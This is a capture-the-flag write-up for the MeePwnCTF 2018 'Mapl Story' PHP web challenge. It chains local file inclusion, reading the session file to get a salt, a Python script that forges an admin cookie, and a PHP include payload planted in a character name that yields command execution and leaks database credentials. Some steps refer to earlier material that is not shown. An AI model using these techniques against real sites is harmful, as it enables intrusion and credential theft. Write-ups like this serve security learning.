Mapl Story was part of the MeePwnCTF Quals 2018 and consists of a webpage where you can name a “character” and teach a pet a command. You get the source code, but the config is censored.

## Have a look around

First off, let's create an account, e.g. foobar@example.org / foobar123, and set any name; we'll change it later.

Sign in and have a look at your cookies: you'll see a PHPSESSID and a _role. _role is generated as either sha256("admin".$salt) or (in our case) sha256("user".$salt), so we need the salt before we can forge the admin value.

Have a look around the few pages on the site. The game page is completely irrelevant, just a gimmick.

## File inclusion vulnerability

There is a file inclusion vulnerability in index.php: have a look at e.g. /index.php?page=/etc/group. Unfortunately the page parameter comes from a GET variable that is heavily escaped, so for now there isn't much we can do with this bug directly.

## Let’s get salty

Let's have a look at /index.php?page=/var/lib/php/sessions/sess_PHPSESSID (replace PHPSESSID with your own session ID). The session data is stored in clear text, salt included.
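As an added example (my own code, not part of the original writeup), here is a small Python parser for the PHP session serialisation the LFI above returns, combined with the _role check from the first section: it pulls the salt out of the session, confirms that sha256("user".$salt) reproduces the _role cookie we were given, and only then computes the admin value. The session key names (user, salt, action) and the hex encoding of the hash are assumptions; the sample session content is constructed.

```python
import hashlib
import re

# Constructed sample of a PHP session file as the default "php" serialize
# handler writes it: records of the form name|<serialize() value>, back to back.
# The key names (user, salt, action) are ASSUMED; the writeup only says the
# session file holds the salt and the last logged action line in clear text.
SAMPLE_SESSION = (
    b'user|s:18:"foobar@example.org";'
    b'salt|s:16:"0123456789abcdef";'
    b'action|s:20:"Gave a pet to foobar";'
)


class _Parser:
    """Minimal parser for PHP serialize() output (s, i, d, b, N, a types)."""

    def __init__(self, data: bytes):
        self.data = data
        self.pos = 0

    def _match(self, pattern: bytes) -> re.Match:
        m = re.compile(pattern).match(self.data, self.pos)
        if m is None:
            raise ValueError(f"malformed serialized data at offset {self.pos}")
        self.pos = m.end()
        return m

    def parse_value(self):
        tag = self.data[self.pos:self.pos + 1]
        if tag == b"s":  # s:<byte length>:"<bytes>";  the length, not a quote, delimits
            n = int(self._match(rb's:(\d+):"').group(1))
            value = self.data[self.pos:self.pos + n]
            self.pos += n
            self._match(rb'";')
            return value.decode("utf-8", "surrogateescape")
        if tag == b"i":
            return int(self._match(rb"i:(-?\d+);").group(1))
        if tag == b"d":
            return float(self._match(rb"d:([^;]+);").group(1))
        if tag == b"b":
            return self._match(rb"b:([01]);").group(1) == b"1"
        if tag == b"N":
            self._match(rb"N;")
            return None
        if tag == b"a":  # a:<count>:{<key><value>...}
            count = int(self._match(rb"a:(\d+):\{").group(1))
            result = {}
            for _ in range(count):
                key = self.parse_value()
                result[key] = self.parse_value()
            self._match(rb"\}")
            return result
        raise ValueError(f"unsupported type {tag!r} at offset {self.pos}")


def parse_php_session(raw: bytes) -> dict:
    """Split a session file into name|value records and deserialize each value."""
    p = _Parser(raw)
    session = {}
    while p.pos < len(raw):
        bar = raw.index(b"|", p.pos)
        name = raw[p.pos:bar].decode()
        p.pos = bar + 1
        session[name] = p.parse_value()
    return session


def role_cookie(role: str, salt: str) -> str:
    """_role as the writeup describes it: sha256(role . salt); hex output is assumed."""
    return hashlib.sha256((role + salt).encode()).hexdigest()


def forge_admin_role(session: dict, observed_role: str) -> str:
    """Confirm the salt reproduces our own 'user' cookie, then emit the 'admin' one."""
    salt = session["salt"]
    if role_cookie("user", salt) != observed_role:
        raise ValueError("observed _role != sha256('user'.salt): wrong key or wrong scheme")
    return role_cookie("admin", salt)


if __name__ == "__main__":
    sess = parse_php_session(SAMPLE_SESSION)
    print(sess)
    # Stand-in for the _role cookie the browser sent for our own account.
    my_role = role_cookie("user", sess["salt"])
    print("admin _role:", forge_admin_role(sess, my_role))
```

The check against our own user cookie matters: if it fails, either the session key holding the salt is named differently or the hash is built differently from what we assumed, and an admin cookie computed anyway would just be rejected.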

## Choose a new name

Well, if you looked carefully at the session file you would have noticed the clear-text action part, which contains the last logged line. There is one log line in the code base that we control: when giving a player a pet, the log line ends with the character name.

I think `<?=include"$_COOKIE[0]` is a beautiful name, don't you think? So what does this do? When index.php includes the session file via the page parameter, PHP executes the planted `<?=` tag, which includes whatever file the cookie named 0 points to; no closing quote or semicolon is needed in the name, because the session serialisation stores it as `s:N:"…";` and that trailing `";` completes the statement. Since cookies are not filtered inside the script, we now have full control over the file inclusion.

Now that everything is prepared we need a final way to execute the base64-encoded PHP code we trained our pet with earlier. That's really simple, since PHP has a built-in stream filter for it: php://filter/convert.base64-decode/resource=path/to/file decodes the file on the fly as it is included.

In the case of foobar@example.org (using the upload path mentioned before), a command execution now returns output like this: a directory listing, followed by the 1 that `<?=` echoes because include returns 1 on success:

```
assets
character.php
dbconnect.php
die.php
game.php
home.php
index.php
logout.php
mapl_library.php
register.php
setting.php
style.css
1
```

## Attack!

From there we can take a look at dbconnect.php (&1=cat%20dbconnect.php) and we'll find the MySQL username and password:

```php
define('DBUSER', 'mapl_story_user');
define('DBPASS', 'tsu_tsu_tsu_tsu');
define('DBNAME', 'mapl_story');
```

Now let’s see what’s in the mapl_config table that is mentioned a few times in the script (it should at least contain the encryption key):